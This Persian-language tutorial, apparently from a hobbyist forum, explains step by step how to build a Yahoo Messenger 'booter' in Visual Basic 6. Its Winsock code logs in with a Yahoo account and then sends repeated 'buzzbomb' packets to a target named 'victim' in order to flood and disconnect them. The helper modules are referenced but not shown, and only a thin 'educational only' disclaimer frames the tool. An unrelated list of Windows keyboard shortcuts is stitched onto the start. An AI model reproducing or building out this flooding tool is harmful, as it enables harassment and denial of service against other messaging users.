ARROW ALT+DOWN : پايين رفتن در لسيت در پنجره سازمان دهي علايق (FAVORITES)

CTRL+X : حذف ( درصورت امکان) و انتقال کپي عنصر انتخاب شده به حافظه

CTRL+C : کپي عنصر انتخاب شده به حافظه

CTRL+V : اضافه نمودن عنصر درون حفافظه در مکان فعلي

CTRL+A : انتخاب تمام عناصر

---

چگونه یک بوتر بسازیم ؟ 

توجه :

این جانب نویسنده این مقاله هیچ مسئولیتی در قبال استفاده شما از مطالب این مقاله را بر عهده نمی گیرم زیرا این مقاله فقط جنبه آموزشی دارد و در صورتی که با این موضوع موافق نیستید از خواندن ادامه این مقاله پرهیز کنید .

شاید تا بحال اتفاق افتاده که بعد از کلی گشتن به دنبال یک برنامه بوت خوب به این فکر کنید که اگه میتونستید خودتون یه بوتر بسازید بهترین بوتر رو می ساختید . حالا من می خواهم بهتون کمک کنم که این آرزو به واقعیت بپیوندد البته من فقط راه رو نشونتون میدم اگه میخواهید تو این راه از بقیه جلو تر باشید خودتون باید تلاش کنید . اگه یکم تلاش کنید حتی میتونید یک ربات پاسخ گو برای یاهو بنویسید .

خوب واسه شروع لازمه که ویژوال بیسیک 6 رو رو سیستم خودتون نصب کنید حالا اون رو اجرا کنید و یه فرم جدید باز کنید

خوب بعد از این کار لازمه که چند تا کنترل هم به فرمتون اضافه کنید که به شرح زیر می باشد :
3 تا تکست باکس به نام username و password و victim
3 تا کامند باتن به نامهای connect و disconnect و boot
1 لیبل به نام status که خاصیت Caption اون رو به Disconnect تغیر دهید

البته در شکل یه سری کنترل های دیگه ای هم وجود داره که انتخوابی هستش و هرجوری که دوست دارید میتونید اونا رو ایجاد و نامگزاری کنید
یک کنترل وینساک به نام winsock1

توجه نمائید برای اضافه کردن این کنترل به نوار ابزار ابتدا دکمه کنترل را به همراه دکمه T به طور همزمان فشار دهید بعد یه پنجره باز میشه که باید دنبال عبارت میکروسافت وینساک 6 بگردین

خوب حالا میریم سر اصل مطلب . شما برای ایجاد بوتر نیاز به 2 تا ماژول هم دارید که اون رو میتونید ازاینجا دانلود کنید بعد باید این ماژول ها رو به پروژه خود اضافه کنید واسه همین کار از منوی ویو پروجکت اکسپلورر رو انتخواب کنید Tools -> Project Explorer

حالا از پنجره سمت چپ روی نام پروژه کلیک و سپس از منوی Add عبارت ماژول Module رو انتخواب نمائید
خوب حالا یه پنجره باز میشه که دارای 2 تا تب tab هستش و شما باید تب Existing رو انتخواب و ماژول ها رو انتخواب نمائی
چون امکان انتخواب همزمان 2 تا ماژول نیست طبیعی که 2 بار باید این کار رو انجام بدین

حالا بریم سر اصل مطلب . روی command1 کلیک کنید و کد زیر رو وارد نمائید

Winsock1.Close
Winsock1.Connect "scs.msg.yahoo.com", 5050

با این کد با فشرده شدن دکمه اول به آدرس "scs.msg.yahoo.com" ارتباط بر قرار میکنیم

حالا باید بریم سروقت کنترل وین ساک
روی کنترل وینساک کلیک کنید و در قسمت بالا سمت راست عبارت Connect رو انتخواب نمائید

سپس کد زیر را اضافه نمائید

status.Caption = "Connecting "
Winsock1.SendData Get_Key(username.text)

حالا همون بالا سمت راست عبارت Data Arrival رو انتخواب نمائید و کد زیر را وارد نمائید

Dim Data As String, ChallengeString As String
Winsock1.GetData Data
Select Case Asc(Mid(Data, 12, 1))
Case Is = 87
ChallengeString = Split(Data, "94À€")(1)
ChallengeString = Split(ChallengeString, "À€")(0)
getencrstrings username.text,password.text, ChallengeString, Crypt(0), Crypt(1), 1
Winsock1.SendData Login(username.text)
SessionKey = Mid(Data, 17, 4)
Case Is = 84
status.Caption = "Wrong Password "
Winsock1.Close
Case Is = 85
status.Caption = " Connected"
End Select
Debug.Print Asc(Mid(Data, 12, 1)) & " - " & Data

حالا دوباره به جای DataArivall عبارت Close رو انتخواب نمائید و کد زیر را وارد نمائید

status.Caption = " Disconnected."

و در آخر عبارت Error رو انتخواب نمائید و کد زیر را وارد نمائید

Winsock1.close
status.Caption = "Error Login "

خوب حالا وقتی Username و Passworde یک آیدی یاهو رو بنویسید و Command1 رو فشار بدین آیدیتون آن لاین میشه و حالا نوبته بوت کردنه پس بریم سر کد بوت :

حالا روی command2 کلیک کنید و کد زیر را وارد نمائید

If Winsock1.State = sckConnected Then
Winsock1.SendData buzzbomb(username.text, victim.text)
End If
If Winsock1.State = sckConnected Then
Winsock1.SendData buzzbomb(username.text, victim.text)
End If
If Winsock1.State = sckConnected Then
Winsock1.SendData buzzbomb(username.text, victim.text)
End If
If Winsock1.State = sckConnected Then
Winsock1.SendData buzzbomb(username.text, victim.text)
End If
If Winsock1.State = sckConnected Then
Winsock1.SendData buzzbomb(username.text, victim.text)
End If
If Winsock1.State = sckConnected Then
Winsock1.SendData buzzbomb(username.text, victim.text)
End If

خوب اینم از بوت البته این تابع buzzbomb یکی از حالات بوت هستش و هر نوع بوتی یه تابع جدا هستش که کد خواصی رو داره و من سعی میکنم چند تا از این توابع رو واستون توی ماژول Packets بزارم خودتون دنبالش بگردین

حالا کار ما تموم شده و می خواهیم از یاهو Disconnect بشیم . واسه این کار فقط کافیه که روی Command3 کلیک کنیم و کد زیر را وارد نمائیم

status.Caption = " Disconnected."
Winsock1.Close

خوب اینم از این مقاله , فکر می کنم مقاله خوبی باشه برای شروع . یادتون باشه که تنها چیزی که برای پیشرفت مهم هستش پشت کار هستش و شما با یه کم حوصله و پشت کار میتونید به هر جا که می خواهید برسید . فقط در آخر یه توضیح باید بدم اونم اینه که به همراه این ماژولها یه فایل با نام YMSG12ENCRYPT.dll هستش که اونو باید توی پوشه پروژتون یعنی تو همون فولدری که این پروژه رو ذخیره کردین کپی پست کنید و یه نکته هم اینکه تمام این بخشهایی که بالا توضیح دادم مثلا انتخواب DATA Arrival یا Close بعد از انتخواب یه تابع به صورت زیر باز میشه که کدهای هر بخش را باید درون ان تابع قرار دهید مثلا :

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
... محل قرار گرفتن کدها
End Sub